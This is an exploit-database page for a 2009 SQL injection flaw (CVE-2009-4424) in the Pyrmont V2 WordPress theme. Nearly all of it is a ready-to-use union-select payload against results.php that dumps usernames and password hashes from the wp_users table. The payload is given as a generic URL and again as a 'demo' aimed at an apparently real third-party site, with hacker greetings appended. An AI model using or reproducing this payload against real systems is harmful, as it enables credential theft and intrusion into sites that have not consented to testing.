WordPress and Pyrmont V2. SQL Injection Vulnerability



EDB-ID: 10535 CVE: 2009-4424OSVDB-ID: 61407
Author: GamoscuPublished: 2009-12-18Verified: Not Verified
Exploit Code:   DownloadVulnerable App:    Download

Rating

(0.0)
Prev Home Next
#############################################################
# WordPress and Pyrmont V2. SQL Injection Vulnerability
# Plugin Home: http://wordpress.org/extend/themes/pyrmont-v2
# Author: Gamoscu
# Site: www.1923turk.biz
#  Site: http://gamoscu.wordpress.com/
##############################################################
# Exploit:
http://server/path/results.php?id=-9999+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users
           -9999+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users
# Demo: http://cc.cc.moose.cc/maps/results.php?id=-9999+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users
##############################################################
# Greetz: Manas58 Baybora Delibey Tiamo Psiko
##############################################################
Vatan Lafla DeĆ°il Eylemle Sevilir






Comments

No comments so far